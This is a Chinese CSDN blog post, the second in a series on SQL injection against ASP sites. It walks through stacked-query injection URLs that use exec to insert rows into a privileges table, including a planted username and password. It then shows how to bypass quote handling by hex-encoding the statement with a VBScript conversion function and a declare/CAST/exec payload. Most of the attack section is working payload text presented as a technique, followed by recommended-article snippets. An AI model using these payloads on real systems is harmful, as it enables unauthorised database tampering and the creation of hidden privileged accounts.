Sql注入深入解析二

最新推荐文章于 2024-09-23 09:14:08 发布
最新推荐文章于 2024-09-23 09:14:08 发布
阅读量465 收藏
点赞数
分类专栏: 黑客技术 文章标签: sql insert c function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lizuwu/article/details/4401318
版权

细心的读者一定发现,我只插入了2个数值型,而没有插入字符型

1、插入int型

 

http://www.*.com/index.asp?fn=登录日志';exec('insert Test (ID,Privs) values(1,1)')--

 

select top 10  * from log where sysFunName='登陆日志';exec('Insert Test(ID,Privs) values(1,1)')--

 

2、插入字符型

http://www.*.com/index.asp?fn=登录日志';exec('insert Test (ID,username,password,Privs) values(1,'Test','123456',1)')--

 

select top 10  * from log where sysFunName='登陆日志';exec('Insert Test(ID,username,password,Privs) values(1,'Test','123456',1)')--

 

这么插入是不行的,语句不支持

那怎么办呢?

此时将引入黑客最常用的技术了,在sql的查询管理器中,输入一下语句,观察一下发生的变化

print cast(65 as varbinary)à0x00000041

print cast(‘A’ as varbinary)à0x41

print cast(0x41 as nvarchar)àA

print cast(0x4100 as nvarchar)àA

print cast(0x410000 as nvarchar)àA

print cast(0x41000000 as nvarchar)àA

 

 

0x表示十六进制,A的ASCII值为65,转化为16进制就是41,也就是0x41

看到这个,大家应该都明白了,就是把语句换为16进制写法。

提供一个简单的16进制转换函数

function change(flag)
   dim charChange,allLen,i
   allLen = len(flag)
   for i = 1 to allLen
      charChange = charChange&Hex(asc(mid(flag,i,1)))
   next

   change = charChange
End Function

 

insert Test (ID,usernaem,password,Privs) values(1,'Test','123456',1)转化为16进制:

0x696E7365727420546573742849642C757365726E616D652C70617373776F7

2642C5072697673292076616C75657328322C276C697A757775272C27313

233343536272C3229

注意:中间不可有回车

 

于是,这么输入

http://www.*.com/index.asp?fn=登录日志';declare @S nvarchar(4000);set @s=Cast(

0x696E7365727420546573742849642C757365726E616D652C70617373776F7

2642C5072697673292076616C75657328322C276C697A757775272C27313

233343536272C3229 as varchar(500)

);exec(@S)--

 

程序将这么执行

select top 10 * from log where sysFunName='登录日志';declare @S nvarchar(4000);SET @S=CAST(0x696E7365727420546573742849642C757365726E616D652C70617373776F72642C5072697673292076616C75657328322C276C697A757775272C27313233343536272C3229 AS varchar(500));exec(@S)--m j

 

于是,插入一条数据完成。

 

下一节将讲述一个最常见的注入攻击例子

lizuwu
关注
专栏目录
sql注入原理及解决方案
m0_59673895的博客
11-16 4万+
②不安全的数据库配置;⑥多个提交处理不当。这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分常用的查询数据类型总是以数字与字符来区分的,所以就会产生注入点为何种类型。
SQL血缘解析
butterBallj的博客
08-27 1072
是编程语言解析和编译过程中产生的一种树状数据结构,它表示源代码的语法结构。AST 抽象出代码的语法特征,同时剔除不必要的语法细节,提供了程序结构的抽象表示。
深入分析SQL注入攻击及安全防范
09-12
深入分析SQL注入攻击及安全防范.....
Sql注入深入解析
lizuwu的专栏
08-02 520
前几个星期,我写的一个网站又被人给sql注入了,这是第N次发生了,看着满目疮痍的网站,杀人的心都有。于是熬了一个夜,将所有带号的写入都给抓下来了过了一个星期,终于抓到代码了。经过一番研究,终于搞明白了 也曾经看过好多这方面的文章,但是一直都没有真正搞明白,主要原因是作者没有写的详细,鉴于此,我决定写一个很详细的注入解析 下边是一个常见的显示log表第一列与第三列的过程ca
渗透攻防web篇-sql注入攻击中级
煮酒闲谈
08-05 4036
Preface 找到SQL注入漏洞后,我们可以用它来干什么呢?那么本篇文章给大家带来的就是SQL注入漏洞利用技术,现在是时候让我们去体验一下漏洞利用的乐趣了。 目录 第三节 利用SQL注入 3.1 识别数据库3.2 UINON语句提取数据3.3 枚举数据库3.4 窃取哈希可令3.5 获取WebShell 第四节 SQL盲注利用 4.1 初识SQL盲注4.2 SQL盲注入技术
深入理解黑客攻击-sql注入攻击
linxizi0622的博客
11-09 2119
在这个登录页面,我们需要知道用户名和密码,但是也有一种途径,不需要知道用户名和密码 也可以进入网页,这叫做sql注入攻击 对于上面的这个表格,左边是用户名右边是密码 这是登录页面的代码 StringSqlString=“Select* FromUSER Where用户名=‘”+ Username.text()+”’And密码=‘”+Password.Text()+”
网络安全之SQL注入深入分析
kali_Ma的博客
12-07 1812
0x00 前言 我们知道代码审计Java的SQL注入主要有两点:参数可控和SQL语句可拼接(没有预编译)。并且我们也清楚修复SQL注入的方式就是预编译,但是可能我们并不清晰内部预编译的具体实现。本文主要从代码层面深入分析三种Java不同数据库框架下的SQL注入以及预编译。 0x01 JDBC SQLi 不使用占位符拼接情况分析 Statement statement = connection.createStatement(); String sql = "select * from user where
sql注入基础原理(超详细)
热门推荐
会哭的雨@的博客
05-17 13万+
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Busi...
DVWA靶场SQL注入
Tangyoo的博客
07-03 1133
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
sql注入字典fuzz
01-11
通过对SQL注入字典fuzz的详细解析,我们可以了解到SQL注入攻击的基本原理及其防范措施。掌握这些知识点对于提高个人和组织的信息安全防护水平具有重要意义。未来随着技术的发展,SQL注入字典也会不断更新和完善,以...
360提供的php防sql注入代码修改类
05-02
本文将深入探讨360提供的PHP防SQL注入代码修改类,以及如何通过此类来防范这两种攻击。 一、SQL注入 SQL注入是一种利用网站应用程序的漏洞,通过输入恶意SQL语句来控制数据库的攻击手段。攻击者可以获取、修改、...
深入了解SQL注入
12-15
SQL注入是一种严重的网络安全威胁,它发生在Web应用程序中,当攻击者能够通过输入恶意SQL代码来操纵后端数据库时。理解并防止SQL注入至关重要,因为这种攻击可能导致数据泄露、数据破坏甚至是整个系统的瘫痪。 1. *...
SQL注入漏洞演示源代码
09-29
在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的SQL语句来操纵或破坏数据库的一种手段。攻击者通常在Web表单中输入特殊字符序列,使得应用...
SQL注入漏洞解析(环境SQLi-labs)
twowords的博客
02-04 1389
SQL注入漏洞详解 什么是SQL注入 原理: Sql注入,由于Web应用程序对用户输入数据的合法性没有判断和过滤,导致后台SQL语句拼接了用户的输入。用户可以通过构造不同的Sql语句来实现对数据库的任意操作。(如:增删改查)。 解释:当我们用户在前端浏览器页面做一些事情的时候,当需要与数据库进行交互时,比如最简单的登陆账号,web应用程序接收到我们账号密码后,需要后台有这样一个数据库的命令,去查询数据库中是否有这样的一个账号密码与之对应,然后做出判断:是否存在用户名,若存在,用户名与密码是否相匹配。然而
[OPEN SQL] SELECT语句
最新发布
Hudas的博客
09-23 498
本文主要讲解OPEN SQL读取数据的SELECT语句相关知识点
SQL - 进阶语法(一)
qq_51222843的博客
09-21 537
关于SQL的进阶语法教程,包括简单合并数据库,修改数据库内容等操作
LeetCode_sql_day28(1767.寻找没有被执行的任务对)
Darling博客
09-19 747
掌握 用recursive循环 构造数列先用1作为起点再将一个值作为where 终点 此处来源表为recursive后的表。
深入解析ASP SQL注入漏洞
"SQL注入—ASP注入漏洞全接触" SQL注入是一种常见的网络安全问题,它发生在应用程序未能充分验证用户输入时,允许攻击者向数据库发送恶意SQL命令。ASP(Active Server Pages)是一种微软开发的服务器端脚本语言,常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值